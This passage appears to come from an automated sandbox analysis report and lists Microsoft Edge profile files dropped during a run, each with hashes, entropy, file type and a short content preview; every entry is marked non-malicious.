te_time":"13377004433895179","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF44d9f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568133553479284
Encrypted:	false
SSDEEP:	768:dHENOCxbWPMCfC18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVwv62rwWp4tum:dkACxbWPMCfC1u1jagY6Ttt9
MD5:	2031C55DAFA09785FC63A056D8E2A845
SHA1:	10FA810880B9BEB732441C564E4B5F9BFF95340A
SHA-256:	1EB8191D9D6DC940A15D7060A88E168B09DB80C2E5180FB34EA7C40713AED09B
SHA-512:	4FF3DC1C6B0492878FFC8DDBA8150FCC16E0A46CC4C2BD6A0DB2E80D3455ED9A75A35E76F50E6190A1F8202A14416C559D13019079DE1BFED585AB38560667AB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377004433895179","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377004433895179","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.83032555790637
Encrypted:	false
SSDEEP:	24:F2xc5Nmkcncmo0CRORpllg2DvfRHecbVdCRORpllg2Sc03osxrKCRORpllg2DKRK:F2emttrdDvfBrXrdYxirdDKBNrdzJBi
MD5:	FCECD35E6C7256FDC8196665C3067DFE
SHA1:	F13EA977416D7559BB8A4E65EBA87236254CE2BF
SHA-256:	739924AB519CD79E823BCB17083ACB25BD97A800E781CB32E945911A24D41DE8
SHA-512:	3512297869AF232F6A373EC5F2058A2C27324EF0A9AAB936CDE7A2CD2489A6BBA96EA7718208C9F0BCE9EE753E238DCC3039434FCF9764580933B55AD12FDF4B
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2.^.%m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	299
Entropy (8bit):	5.145821659372387
Encrypted:	false
SSDEEP:	6:HAnNB1923oH+TcwtE/a252KLlVAnkQq2P923oH+TcwtE/a2ZIFUv:geYeb8xLokQv4Yeb8J2FUv
MD5:	8989B45D2A01CA406D5EB03BA792B18A
SHA1:	D4E0928B2CF76156981B0EA684DEEB435E22E4E4
SHA-256:	366330D788C99790055FF4B9E17A947FBF2E8B4521E85E39EAA332F18B211AE0
SHA-512:	12ED716AB6D70FEFC14D3C66952CC2A0A3A53E9C5C7149E4EC8AA153D004FC3253E59588B75B46C027642EA430083870CA271DA40AD5BAF72774BC352F7582AD
Malicious:	false
Preview:	2024/11/25-05:34:11.834 1e20 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/25-05:34:11.857 1e20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	114376
Entropy (8bit):	5.578247339910156
Encrypted:	false
SSDEEP:	1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYgBe:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFc
MD5:	F904BB92571513929BBF5289D73170CA
SHA1:	15898623ABD863FFA1BF8724994A3FBB0B98BECB
SHA-256:	6107E160EA6AD019852BA37C7EA36F9206843DAF60D5420B41A4984034C594A3
SHA-512:	68099EB59259D1B7C150454BE8B0CC34B7FAC083CD47012E20EEEADBFE8711728B04311EACFFAE95357CF201C99BA4CA4C90D2EDC19D5E8EB80536DD86985A61
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188865
Entropy (8bit):	6.385991027887965
Encrypted:	false
SSDEEP:	3072:VUMBLymm4vMVwmwaiGmT/sL//XMb9B3Tc3Hzx9EPv2zb:K2PmwImT0L/PmBYkWH
MD5:	75857A3EF2A84BE27BC7BE5633E76198
SHA1:	60765634561E06A5787FAF14BC4058BE4A2595F7
SHA-256:	24C24F79C977B54A2DEDE8EC1B3E7529E9929C4DEB4D56A584D09F1603830586
SHA-512:	6CE7E94F788D5F51CE8C6C0A818A34EC64942CA8297214887365396BB0DB7A54ACA6A9F48CE4BC0A02C92FCE82ABD1BFE8B51A6AC022CFBC589B7ABA0EE72A6A
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;....x.h........,T.8..`,.....L`.....,T...`......L`......Rc..V.....exports...Rc. ......module....Rc.Z.]....define....Rb.......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m...b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....zY...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5271500973417917
Encrypted:	false
SSDEEP:	3:YzXHFXAyXl/ly/l9/lxE0tlla/lSIR2l:YzXSKmO0gSAC
MD5:	D0D7A6C2E5CCFDE83EC8ECCA9527AB84
SHA1:	190F3F4BC46BC11856F3C7D16A4ACBD43D2CFB7B
SHA-256:	4A1DF1343AE2F75758F62F75EED02A47647E8FE1FEE737BF5EB58A0BB4B32ADF
SHA-512:	894E92F2B542446B94F48E9480FF82759EC14E80D7387B8C0A416C46F20948C25156CF23085AA6AEE6435C5DF52F1D15A450F000DA9222C318AFA7551315BB45
Malicious:	false
Preview:	@...m..moy retne.........................X....,................m-..P./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5271500973417917
Encrypted:	false
SSDEEP:	3:YzXHFXAyXl/ly/l9/lxE0tlla/lSIR2l:YzXSKmO0gSAC
MD5:	D0D7A6C2E5CCFDE83EC8ECCA9527AB84
SHA1:	190F3F4BC46BC11856F3C7D16A4ACBD43D2CFB7B
SHA-256:	4A1DF1343AE2F75758F62F75EED02A47647E8FE1FEE737BF5EB58A0BB4B32ADF
SHA-512:	894E92F2B542446B94F48E9480FF82759EC14E80D7387B8C0A416C46F20948C25156CF23085AA6AEE6435C5DF52F1D15A450F000DA9222C318AFA7551315BB45
Malicious:	false
Preview:	@...m..moy retne.........................X....,................m-..P./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF49576.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5271500973417917
Encrypted:	false
SSDEEP:	3:YzXHFXAyXl/ly/l9/lxE0tlla/lSIR2l:YzXSKmO0gSAC
MD5:	D0D7A6C2E5CCFDE83EC8ECCA9527AB84
SHA1:	190F3F4BC46BC11856F3C7D16A4ACBD43D2CFB7B
SHA-256:	4A1DF1343AE2F75758F62F75EED02A47647E8FE1FEE737BF5EB58A0BB4B32ADF
SHA-512:	894E92F2B542446B94F48E9480FF82759EC14E80D7387B8C0A416C46F20948C25156CF23085AA6AEE6435C5DF52F1D15A450F000DA9222C318AFA7551315BB45
Malicious:	false
Preview:	@...m..moy retne.........................X....,................m-..P./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	6623
Entropy (8bit):	3.3835157168511794
Encrypted:	false
SSDEEP:	192:5utYsL+4EGmMYyXrhoVc49Xp+iKic5SLl9iSrYjyej64:5ut3DmMYyXM9Xp+hB5SLl9iSrc7f
MD5:	9A2665842844E5EABA794A0857DED177
SHA1:	C60D08163C893FF51E7AD4404EE4DA384034103C
SHA-256:	DFBF51003DB387C5AC89CC12023F3461B4EDEC3730B735DF2A7688D7F05EAF3B
SHA-512:	E451A6BAE3AC8B574E39917319E2C4CC33AE83BD85EF9605316CB819530A2E45C611F00E6C8BB99CD3E682CBD22FAA089743C2100568AB696FD4D231F26A8B39
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............W1..b................next-map-id.1.Cnamespace-9fe563cf_4e22_4c3e_88eb_855d01238057-https://ntp.msn.com/.0V.e................V.e................V.e................4j.a.................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.e.t.q.o.h.p.a.d.c.,.p.r.g.-.e.h.p.s.b.h.v.c.,.x.a.d.s.-.a.d.q.i.s.c.b.m.m.-.t.,.a.d.s.-.f.l.r.m.g.p.-.t.u.n.e.d.-.t.,.s.i.d.-.f.l.r.n.o.i.s.e.2.,.s.i.d.a.m.o.-.f.l.r.-.s.t.a.g.e.,.p.r.g.-.1.s.-.d.w.v.i.d.-.c.t.r.,.i.c.r.s.c.a.l.l.-.s.p.o.r.t.s.,.p.r.g.-.1.s.w.-.s.a.-.m.a.i.p.r.o.f.i.l.e._.c.,.p.r.g.-.1.s.w.-.s.a.p.h.i.d.e.i.1.t.3.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.p.d.,.p.r.g.-.1.s.w.-.n.o.a.b.r.t.-.r.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.148416826691277
Encrypted:	false
SSDEEP:	6:HAXQtTzN+q2P923oH+TcwtrQMxIFUt8YAXQtVNZmw+YAXQtbB3VkwO923oH+TcwJ:gAtN+v4YebCFUt87AtVN/+7AtV3V5LYM
MD5:	9284241082F0BCCE0F47FF6E5B4F307E
SHA1:	10E12D329654F3AA60B2AAFB9E0B8B957AB05257
SHA-256:	7EF9972E4FACD6FC86578AEFD0B36FDDB2A43B17BC0B2A8F73AD1B14FC086A4E
SHA-512:	EA81468855449DFB300ABD695E87F862EBBF4039B39EDC2EA0C9196C96FE1C31620C6733B939414F3C5B9169F769EDE2B0E976FF1036A4CC989DAA0BBB884FC7
Malicious:	false
Preview:	2024/11/25-05:33:54.811 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/25-05:33:54.817 1f2c Recovering log #3.2024/11/25-05:33:54.819 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.148416826691277
Encrypted:	false
SSDEEP:	6:HAXQtTzN+q2P923oH+TcwtrQMxIFUt8YAXQtVNZmw+YAXQtbB3VkwO923oH+TcwJ:gAtN+v4YebCFUt87AtVN/+7AtV3V5LYM
MD5:	9284241082F0BCCE0F47FF6E5B4F307E
SHA1:	10E12D329654F3AA60B2AAFB9E0B8B957AB05257
SHA-256:	7EF9972E4FACD6FC86578AEFD0B36FDDB2A43B17BC0B2A8F73AD1B14FC086A4E
SHA-512:	EA81468855449DFB300ABD695E87F862EBBF4039B39EDC2EA0C9196C96FE1C31620C6733B939414F3C5B9169F769EDE2B0E976FF1036A4CC989DAA0BBB884FC7
Malicious:	false
Preview:	2024/11/25-05:33:54.811 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/25-05:33:54.817 1f2c Recovering log #3.2024/11/25-05:33:54.819 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13377004436387015

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.8344421897129153
Encrypted:	false
SSDEEP:	24:34DTEXQyeYpsAF4unxctLp3X2amEtG1ChqTei6J54QKkOAM4J:3CIXQMzFKLp2FEkCheehZHOp
MD5:	B9A0AB4A9549FEAB36F646F722E5881E
SHA1:	80D7314B00698DDA94EBBF24A32AA83A6AA23193
SHA-256:	09B2A804FF6E8C5848090E77DFA8A4ADD0ADC4C47E6AB4C0C4C0443A6ECAA16E
SHA-512:	26D1C1709E014808CEE9A484048566838AB47F56C6E45E64101E239735E3C4F98B2F16B3A6E326E66744E624817201EFAD7E015DE620B008C7BCBA02B1E6A377
Malicious:	false
Preview:	SNSS.........m!.............m!......"..m!.............m!.........m!.........m!.........m!....!....m!.................................m!..m!1..,.....m!$...9fe563cf_4e22_4c3e_88eb_855d01238057.....m!.........m!.....1...........m!.....m!.........................m!....................5..0.....m!&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......m!.........m!............................m!.............m!........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........,E.'....,E.'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.061313242549305
Encrypted:	false
SSDEEP:	6:HAXQtHIq2P923oH+Tcwt7Uh2ghZIFUt8YAXQtHZZmw+YAXQtHzkwO923oH+Tcwts:gAtov4YebIhHh2FUt87At5/+7AtT5LYz
MD5:	88DA3A27879A42F32ED366DA31F59472
SHA1:	FC2F4846C7A2B33454040ED40FF52C1496285FA8
SHA-256:	AAF918146D9506CBB9B0F573BBCF6B45394FD9F339B0EF4E4E406E7213CF6CE9
SHA-512:	DC9891E1DF4FA823386D496D596984858910C39E06F2E2A1A9E3A2CE7AA77E4B2439BA1A9A21DEEC831B0FAA32C13855BE64FD1208176D946C827C3A34F53CAD
Malicious:	false
Preview:	2024/11/25-05:33:54.005 1e50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/25-05:33:54.005 1e50 Recovering log #3.2024/11/25-05:33:54.005 1e50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.061313242549305
Encrypted:	false
SSDEEP:	6:HAXQtHIq2P923oH+Tcwt7Uh2ghZIFUt8YAXQtHZZmw+YAXQtHzkwO923oH+Tcwts:gAtov4YebIhHh2FUt87At5/+7AtT5LYz
MD5:	88DA3A27879A42F32ED366DA31F59472
SHA1:	FC2F4846C7A2B33454040ED40FF52C1496285FA8
SHA-256:	AAF918146D9506CBB9B0F573BBCF6B45394FD9F339B0EF4E4E406E7213CF6CE9
SHA-512:	DC9891E1DF4FA823386D496D596984858910C39E06F2E2A1A9E3A2CE7AA77E4B2439BA1A9A21DEEC831B0FAA32C13855BE64FD1208176D946C827C3A34F53CAD
Malicious:	false
Preview:	2024/11/25-05:33:54.005 1e50 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/25-05:33:54.005 1e50 Recovering log #3.2024/11/25-05:33:54.005 1e50 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.249713351775924
Encrypted:	false
SSDEEP:	12:gAtIv4YebvqBQFUt87AtF1/+7AtM5LYebvqBvJ:44YebvZg8W6LYebvk
MD5:	97E2B006B37277414387014BEF3126BD
SHA1:	1BDBF3B14926CAFE0401573EE98790254808C136
SHA-256:	E98E30B46D5237DC8730EFBB850DDF6622BD42D112EE4B10DB6D3BC27C501880
SHA-512:	908D6D08B790840128BD7DF7B51A5B1F0417026B13A36ED7C7D8FC38F2FCE51FE4B9E1B60DBC414437027B1417FEE5BB55887AAD4408268370F74749C9DE78BB
Malicious:	false
Preview:	2024/11/25-05:33:54.873 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/25-05:33:54.875 1f70 Recovering log #3.2024/11/25-05:33:54.878 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.249713351775924
Encrypted:	false
SSDEEP:	12:gAtIv4YebvqBQFUt87AtF1/+7AtM5LYebvqBvJ:44YebvZg8W6LYebvk
MD5:	97E2B006B37277414387014BEF3126BD
SHA1:	1BDBF3B14926CAFE0401573EE98790254808C136
SHA-256:	E98E30B46D5237DC8730EFBB850DDF6622BD42D112EE4B10DB6D3BC27C501880
SHA-512:	908D6D08B790840128BD7DF7B51A5B1F0417026B13A36ED7C7D8FC38F2FCE51FE4B9E1B60DBC414437027B1417FEE5BB55887AAD4408268370F74749C9DE78BB
Malicious:	false
